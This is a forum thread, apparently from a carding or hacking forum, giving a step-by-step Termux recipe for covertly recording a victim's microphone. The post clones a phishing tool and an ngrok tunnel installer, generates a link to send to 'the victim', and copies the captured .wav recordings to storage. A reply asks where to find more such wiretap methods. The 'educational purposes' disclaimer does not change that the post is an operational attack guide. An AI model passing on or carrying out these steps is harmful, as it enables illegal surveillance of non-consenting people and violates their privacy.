We install a powerful wiretap on someone else's phone

Hacker

Professional
Messages
1,046
Reputation
9
Reaction score
733
Points
113
This article was written for educational purposes only. We do not call anyone to anything, only for information purposes! The author is not responsible for your actions
We will listen using a regular link. We will analyze the creation below, but to generate the link, be sure to turn off wifi, turn on the access point, and at the same time you must have a mobile Internet.

Let's get started:

1. Launch thermux and enter these commands:
Code:
• pkg upgrade
• pkg upgrade
• pkg install git
• pkg install php
• git clone https://github.com/thelinuxchoice/sayhello
• git clone https://github.com/Marcel0Sousa/termux-ngrok
• cd termux-ngrok
• ./termux-ngrok.sh (then write Y)
• cd
• cd usr
• cd bin
• cp ngrok /data/data/com.termux/files/home/sayhello/
• cd sayhello
• chmod + x sayhello.sh
• ./sayhello.sh

2. This will open "SayHello".
We select Ngrok-02 in it and after a couple of seconds the link we need will be generated, in the screenshot - TYK it is circled in a red oval, it will need to be sent to the victim, and if she allows access to the microphone, then Audio file received will be written to Termux.

3. In order to transfer audio to internal memory, write:
Code:
• termux-setup-storage
• cp (the name of the audio file, you can see the name by writing ls) / storage / emulated / 0 /

After that, the audio files will be saved in .wav format, and you can find them in the internal memory.
 

cardbaron

Carder
Messages
53
Reputation
0
Reaction score
8
Points
8
Hi,

Where can I find more information on this method for wiretaps?

Any help appreciate
 
Top